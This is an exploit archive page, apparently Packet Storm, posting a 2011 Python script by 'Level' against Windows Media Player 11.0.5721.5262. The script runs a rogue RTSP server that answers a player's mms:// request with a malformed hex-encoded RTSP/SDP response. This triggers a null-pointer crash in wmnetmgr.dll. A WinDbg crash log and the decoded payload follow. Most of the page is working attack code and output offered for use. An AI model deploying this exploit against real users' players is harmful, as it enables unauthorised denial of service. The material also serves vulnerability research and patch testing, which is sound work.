exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Windows Media Player 11.0.5721.5262 Denial Of Service

Windows Media Player 11.0.5721.5262 Denial Of Service
Posted Dec 25, 2011
Authored by Level

Microsoft Windows Media Player version 11.0.5721.5262 remote denial of service exploit.

tags | exploit, remote, denial of service
systems | windows
SHA-256 | 8f956aea0456c97de55561f1b85fde6e2d17e46339271b02a273569d29f09677

Windows Media Player 11.0.5721.5262 Denial Of Service

Change Mirror Download
import socket, binascii
print "\n"
print "----------------------------------------------------------------"
print "| WMP11 Remote Null Pointer |"
print "| Level, Smash the Stack |"
print "| Windows XP SP3 x86, Windows Media Player v11.0.5721.5262 |"
print "| Windows 7 SP2 x64, Windows Media Player v11.0.5721.5262 |"
print "----------------------------------------------------------------"
print "\n"
print "Attack URL: mms://127.0.0.1/Sample_Broadcast\n\n"
HOST = "127.0.0.1"
PORT = 554
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
buf = [
("525453502f312e3020323038204f4b0d0a436f6e74656e742d547970653a206170706c696361746"
"96f6e2f7364700d0a566172793a204163636570740d0a582d506c61796c6973742d47656e2d49643"
"a203137360d0a582d42726f6164636173742d49643a20300d0a436f6e74656e742d4c656e6774683"
"a203837390d0a446174653a2053756e2c203038204d617920323031312031353a32343a333320474"
"d540d0a435365713a20310d0a5365727665723a20574d5365727665722f392e312e312e333834310"
"d0a537570706f727465643a20636f6d2e6d6963726f736f66742e776d2e73727670706169722c206"
"36f6d2e6d6963726f736f66742e776d2e737377697463682c20636f6d2e6d6963726f736f66742e7"
"76d2e656f736d73672c20636f6d2e6d6963726f736f66742e776d2e6661737463616368652c20636"
"f6d2e6d6963726f736f66742e776d2e7061636b657470616972737372632c20636f6d2e6d6963726"
"f736f66742e776d2e7374617274757070726f66696c650d0a4c6173742d4d6f6469666965643a205"
"361742c2031372046656220323030372031333a31343a303420474d540d0a457461673a202231363"
"8220d0a43616368652d436f6e74726f6c3a206d61782d6167653d38363339392c20782d776d732d7"
"3747265616d2d747970653d2262726f6164636173742c20706c61796c697374222c206d7573742d7"
"26576616c69646174652c20707269766174652c20782d776d732d70726f78792d73706c69740d0a0"
"d0a763d306f3d2d20323031313035303831343339313330343036203230313130353038313433393"
"1333034303620494e20495034203132372e302e302e310d0a733d3c4e6f205469746c653e633d494"
"e2049503420302e302e302e30623d52523a30613d70676d70753a646174613a6170706c696361746"
"96f6e2f766e642e6d732e776d732d6864722e61736676313b6261736536342c4d4361796459356d7"
"a78476d3251437141474c4f624e4142414141414141414142674141414145436f6479726a4565707"
"a78474f35414441444342545a5767414141414141414141414141414141414141414141414141414"
"1414141414c784141414141414141414141414141414141414141664141414141414141414843677"
"7676b4141414141764d6e50435141414141433546514141414141414141414141414147416741414"
"26749414145673741414331413739664c716e504559376a414d414d49464e6c4c674141414141414"
"141415230744f7275716e504559376d414d414d49464e6c42674141414141416b516663743765707"
"a78474f35674441444342545a566f414141414141414141414f4562746b35627a78476f2f5143415"
"83178454b7742582b794256573838527150304167463963524373414141414141414141414177414"
"1414141414141414151414141414141514145414150414141414141414141416b516663743765707"
"a78474f35674441444342545a5849414141414141414141514a35702b4531627a78476f2f5143415"
"83178454b31444e77372b50596338526937494171674330346941414141414141414141414277414"
"1414149414141414167414141414141595145424145416641414151414141414151415141416f414"
"143494141434141414141414141455141424141415141417a6e5834653431473052474e676742676"
"c386d69736959414141414141414141416741424145673741414143414567374141417a4a724a316"
"a6d62504561625a414b6f41597335734b67414141414141414141434141494141674143414141414"
"141414141414141414141324a724a316a6d62504561625a414b6f415973357337443441414141414"
"1414141414141414141414141414141414141414141414148774141414141414141414241513d3d7"
"43d3020300d0a6d3d617564696f2030205254502f415650203936613d72656c6961626c650d0a0d0"
"a0d0a")
]
while True:
conn, addr = s.accept()
print "-----Request From Client-----\n"
print conn.recv(1024)
print "-----Request From Client-----\n"
print "-----Response From Server-----\n"
print binascii.unhexlify(buf[0])
print "-----Response From Server-----\n"
conn.send(binascii.unhexlify(buf[0]))
conn.close()
s.close()

#CRASH
#(ae8.5b8): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000
#eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
#*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\wmnetmgr.dll -
#wmnetmgr!DllUnregisterServer+0x76320:
#128cd479 8bb914010000 mov edi,dword ptr [ecx+114h] ds:0023:00000114=????????
#0:021> g
#(ae8.5b8): Access violation - code c0000005 (!!! second chance !!!)
#eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000
#eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
#wmnetmgr!DllUnregisterServer+0x76320:
#128cd479 8bb914010000 mov edi,dword ptr [ecx+114h] ds:0023:00000114=????????

#PAYLOAD#
#RTSP/1.0 208 OK
#Content-Type: application/sdp
#Vary: Accept
#X-Playlist-Gen-Id: 176
#X-Broadcast-Id: 0
#Content-Length: 879
#Date: Sun, 08 May 2011 15:24:33 GMT
#CSeq: 1
#Server: WMServer/9.1.1.3841
#Supported: com.microsoft.wm.srvppair, com.microsoft.wm.sswitch, com.microsoft.wm.eosmsg, com.microsoft.wm.fastcache, com.microsoft.wm.packetpairssrc, com.microsoft.wm.startupprofile
#Last-Modified: Sat, 17 Feb 2007 13:14:04 GMT
#Etag: "168"
#Cache-Control: max-age=86399, x-wms-stream-type="broadcast, playlist", must-revalidate, private, x-wms-proxy-split
#v=0o=- 201105081439130406 201105081439130406 IN IP4 127.0.0.1
#s=<No Title>c=IN IP4 0.0.0.0b=RR:0a=pgmpu:data:application/vnd.ms.wms-hdr.asfv1;base64,MCaydY5mzxGm2QCqAGLObNABAAAAAAAABgAAAAECodyrjEepzxGO5ADADC
#BTZWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALxAAAAAAAAAAAAAAAAAAAAfAAAAAAAAAHCgwgkAAAAAvM
#nPCQAAAAC5FQAAAAAAAAAAAAAGAgAABgIAAEg7AAC1A79fLqnPEY7jAMAMIFNlLgAAAAAAAAAR0tOruq
#nPEY7mAMAMIFNlBgAAAAAAkQfct7epzxGO5gDADCBTZVoAAAAAAAAAAOEbtk5bzxGo/QCAX1xEKwBX+y
#BVW88RqP0AgF9cRCsAAAAAAAAAAAwAAAAAAAAAAQAAAAAAQAEAAPAAAAAAAAAAkQfct7epzxGO5gDADC
#BTZXIAAAAAAAAAQJ5p+E1bzxGo/QCAX1xEK1DNw7+PYc8Ri7IAqgC04iAAAAAAAAAAABwAAAAIAAAAAg
#AAAAAAYQEBAEAfAAAQAAAAAQAQAAoAACIAACAAAAAAAAEQABAAAQAAznX4e41G0RGNggBgl8misiYAAA
#AAAAAAAgABAEg7AAACAEg7AAAzJrJ1jmbPEabZAKoAYs5sKgAAAAAAAAACAAIAAgACAAAAAAAAAAAAAA
#A2JrJ1jmbPEabZAKoAYs5s7D4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAHwAAAAAAAAABAQ==t=0 0m=audio 0 RTP/AVP 96a=reliable


Login or Register to add favorites

File Archive:

September 2023

 • Su
 • Mo
 • Tu
 • We
 • Th
 • Fr
 • Sa
 • 1
  Sep 1st
  2 Files
 • 2
  Sep 2nd
  21 Files
 • 3
  Sep 3rd
  0 Files
 • 4
  Sep 4th
  17 Files
 • 5
  Sep 5th
  34 Files
 • 6
  Sep 6th
  29 Files
 • 7
  Sep 7th
  11 Files
 • 8
  Sep 8th
  25 Files
 • 9
  Sep 9th
  0 Files
 • 10
  Sep 10th
  0 Files
 • 11
  Sep 11th
  26 Files
 • 12
  Sep 12th
  23 Files
 • 13
  Sep 13th
  17 Files
 • 14
  Sep 14th
  22 Files
 • 15
  Sep 15th
  16 Files
 • 16
  Sep 16th
  0 Files
 • 17
  Sep 17th
  0 Files
 • 18
  Sep 18th
  19 Files
 • 19
  Sep 19th
  60 Files
 • 20
  Sep 20th
  23 Files
 • 21
  Sep 21st
  15 Files
 • 22
  Sep 22nd
  8 Files
 • 23
  Sep 23rd
  0 Files
 • 24
  Sep 24th
  0 Files
 • 25
  Sep 25th
  17 Files
 • 26
  Sep 26th
  0 Files
 • 27
  Sep 27th
  0 Files
 • 28
  Sep 28th
  0 Files
 • 29
  Sep 29th
  0 Files
 • 30
  Sep 30th
  0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close